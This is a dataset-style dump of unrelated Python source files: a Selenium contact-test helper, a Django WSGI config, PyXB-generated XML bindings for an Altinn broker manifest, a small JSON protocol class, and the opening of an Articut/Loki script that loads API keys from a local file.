self.open_contact_to_view_by_index(index)
text = wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
phone2 = re.search("P: (.*)", text).group(1)
return ContactMainInfo(homephone=homephone, mobilephone=mobilephone, workphone=workphone, phone2=phone2)
def clear(s):
return re.sub("[() - \n]", "", s)
def merge_phones_like_on_home_page(contact):
return "\n".join(filter(lambda x: x != "", map(lambda x: clear(x), filter(lambda x: x is not None, [contact.all_phones, contact.mobilephone, contact.workphone, contact.phone2]))))
def merge_emails_like_on_home_page(contact):
return "\n".join(filter(lambda x: x != "", map(lambda x: clear(x), filter(lambda x: x is not None, [contact.email, contact.email2, contact.email3])))) | 46.135965 | 223 | 0.667839 |
9e2073599f44298ffdd12606cb023cb625646a8d | 1,667 | py | Python | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | null | null | null | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | 33 | 2019-12-04T22:37:50.000Z | 2022-02-10T07:15:35.000Z | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | null | null | null | """
WSGI config for The Values of French project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from pathlib import Path
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# tvof directory.
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent
sys.path.append(str(ROOT_DIR / "tvof"))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 42.74359 | 79 | 0.80144 |
7db00635d2543683eebdc9111a116ad1e0ae8d7f | 27,618 | py | Python | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | # ./manifest.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:c3674a9b44a4a4edf84a5ac08485c938ac789a94
# Generated 2016-08-10 10:54:40.034890 by PyXB version 1.2.4 using Python 2.7.5.final.0
# Namespace http://schema.altinn.no/services/ServiceEngine/Broker/2015/06
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:129fbad8-5ed8-11e6-af5b-eca86bfbeec6')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://schema.altinn.no/services/ServiceEngine/Broker/2015/06', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""This type is the manifest root element. The container of all the file meta-data."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 8, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}ExternalServiceCode uses Python identifier ExternalServiceCode
__ExternalServiceCode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode'), 'ExternalServiceCode', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506ExternalServiceCode', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4), )
ExternalServiceCode = property(__ExternalServiceCode.value, __ExternalServiceCode.set, None, 'This property should hold the service code of the BrokerService being used. Value is required.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}ExternalServiceEditionCode uses Python identifier ExternalServiceEditionCode
__ExternalServiceEditionCode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode'), 'ExternalServiceEditionCode', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506ExternalServiceEditionCode', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4), )
ExternalServiceEditionCode = property(__ExternalServiceEditionCode.value, __ExternalServiceEditionCode.set, None, 'This property should hold the service edition code of the BrokerService being used. Value is required.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}SendersReference uses Python identifier SendersReference
__SendersReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SendersReference'), 'SendersReference', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506SendersReference', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4), )
SendersReference = property(__SendersReference.value, __SendersReference.set, None, 'This property should hold a reference value defined by the file creator. Value is required.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}Reportee uses Python identifier Reportee
__Reportee = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reportee'), 'Reportee', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506Reportee', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4), )
Reportee = property(__Reportee.value, __Reportee.set, None, 'This property will hold the organization number or social security number of the file source. Value is required.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}SentDate uses Python identifier SentDate
__SentDate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SentDate'), 'SentDate', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506SentDate', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4), )
SentDate = property(__SentDate.value, __SentDate.set, None, 'This property will hold the date and time for when the file was received in Altinn. Property value is added by Altinn.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}FileList uses Python identifier FileList
__FileList = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'FileList'), 'FileList', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506FileList', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4), )
FileList = property(__FileList.value, __FileList.set, None, None)
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyList uses Python identifier PropertyList
__PropertyList = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyList'), 'PropertyList', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506PropertyList', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4), )
PropertyList = property(__PropertyList.value, __PropertyList.set, None, None)
_ElementMap.update({
__ExternalServiceCode.name() : __ExternalServiceCode,
__ExternalServiceEditionCode.name() : __ExternalServiceEditionCode,
__SendersReference.name() : __SendersReference,
__Reportee.name() : __Reportee,
__SentDate.name() : __SentDate,
__FileList.name() : __FileList,
__PropertyList.name() : __PropertyList
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""This property should hold a list of the files included in the shipment. This is optional."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 39, 5)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}File uses Python identifier File
__File = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'File'), 'File', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON__httpschema_altinn_noservicesServiceEngineBroker201506File', True, pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7), )
File = property(__File.value, __File.set, None, None)
_ElementMap.update({
__File.name() : __File
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
"""This property should hold information about a file in the package."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 45, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}FileName uses Python identifier FileName
__FileName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'FileName'), 'FileName', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_2_httpschema_altinn_noservicesServiceEngineBroker201506FileName', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10), )
FileName = property(__FileName.value, __FileName.set, None, 'This property should hold the name of the file.')
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}CheckSum uses Python identifier CheckSum
__CheckSum = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'CheckSum'), 'CheckSum', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_2_httpschema_altinn_noservicesServiceEngineBroker201506CheckSum', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10), )
CheckSum = property(__CheckSum.value, __CheckSum.set, None, 'This property should hold the checksum of the file.')
_ElementMap.update({
__FileName.name() : __FileName,
__CheckSum.name() : __CheckSum
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
"""This property can hold a list of custom values agreed upon between sender and receivers. This is optional."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 67, 5)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}Property uses Python identifier Property
__Property = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Property'), 'Property', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_3_httpschema_altinn_noservicesServiceEngineBroker201506Property', True, pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7), )
Property = property(__Property.value, __Property.set, None, None)
_ElementMap.update({
__Property.name() : __Property
})
_AttributeMap.update({
})
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 73, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyKey uses Python identifier PropertyKey
__PropertyKey = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey'), 'PropertyKey', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_4_httpschema_altinn_noservicesServiceEngineBroker201506PropertyKey', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10), )
PropertyKey = property(__PropertyKey.value, __PropertyKey.set, None, None)
# Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyValue uses Python identifier PropertyValue
__PropertyValue = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue'), 'PropertyValue', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_4_httpschema_altinn_noservicesServiceEngineBroker201506PropertyValue', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10), )
PropertyValue = property(__PropertyValue.value, __PropertyValue.set, None, None)
_ElementMap.update({
__PropertyKey.name() : __PropertyKey,
__PropertyValue.name() : __PropertyValue
})
_AttributeMap.update({
})
BrokerServiceManifest = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'BrokerServiceManifest'), CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 7, 1))
Namespace.addCategoryObject('elementBinding', BrokerServiceManifest.name().localName(), BrokerServiceManifest)
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property should hold the service code of the BrokerService being used. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode'), pyxb.binding.datatypes.integer, scope=CTD_ANON, documentation='This property should hold the service edition code of the BrokerService being used. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SendersReference'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property should hold a reference value defined by the file creator. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reportee'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property will hold the organization number or social security number of the file source. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SentDate'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON, documentation='This property will hold the date and time for when the file was received in Altinn. Property value is added by Altinn.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FileList'), CTD_ANON_, scope=CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyList'), CTD_ANON_3, scope=CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4))
counters.add(cc_2)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SendersReference')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reportee')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SentDate')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'FileList')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyList')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'File'), CTD_ANON_2, scope=CTD_ANON_, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'File')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FileName'), pyxb.binding.datatypes.string, scope=CTD_ANON_2, documentation='This property should hold the name of the file.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10)))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CheckSum'), pyxb.binding.datatypes.string, scope=CTD_ANON_2, documentation='This property should hold the checksum of the file.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'FileName')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'CheckSum')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_2._Automaton = _BuildAutomaton_2()
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Property'), CTD_ANON_4, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Property')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_3._Automaton = _BuildAutomaton_3()
CTD_ANON_4._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey'), pyxb.binding.datatypes.string, scope=CTD_ANON_4, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10)))
CTD_ANON_4._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue'), pyxb.binding.datatypes.string, scope=CTD_ANON_4, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_4._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_4._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_4._Automaton = _BuildAutomaton_4()
| 54.906561 | 387 | 0.765805 |
ec7ef5cf291555c32e1144675119b7c949c12d49 | 269 | py | Python | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | import json
from pyleanrtm.protocol import BaseProtocol
class JsonProtocol(BaseProtocol):
name = 'lc-json-1'
def encode(self, cmd):
return json.dumps(cmd)
def decode(self, msg):
return json.loads(str(msg))
json_protocol = JsonProtocol()
| 19.214286 | 43 | 0.687732 |
c5b084394c45cdc7271abd48c296226cdfab4243 | 21,846 | py | Python | intern_practice/ArticutAPI/Demos/PrimarySchoolMath/intentFunction.py | howardsukuan/LokiHub | eaa3cc7299b25192353ed0bfe65c14a4c4b1e082 | [
"MIT"
] | 375 | 2019-05-01T15:15:35.000Z | 2022-03-18T00:54:33.000Z | Demos/PrimarySchoolMath/intentFunction.py | lpluo54/ArticutAPI | 366dd9956d0ee3bd81b422844015101168b4bd34 | [
"MIT"
] | 1 | 2019-07-05T06:50:09.000Z | 2020-08-16T10:02:15.000Z | Demos/PrimarySchoolMath/intentFunction.py | lpluo54/ArticutAPI | 366dd9956d0ee3bd81b422844015101168b4bd34 | [
"MIT"
] | 30 | 2019-09-01T11:17:37.000Z | 2021-12-28T23:05:06.000Z | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import json
import os
import re
import requests
try:
infoPath = "{}/account.info".format(os.path.dirname(os.path.abspath(__file__)))
infoDICT = json.load(open(infoPath, "r"))
USERNAME = infoDICT["username"]
API_KEY = infoDICT["api_key"]
LOKI_KEY = infoDICT["loki_key"]
except:
# HINT: 在這裡填入您在 https://api.droidtown.co 的帳號、Articut 的 API_Key 以及 Loki 專案的 Loki_Key
USERNAME = ""
API_KEY = ""
LOKI_KEY = ""
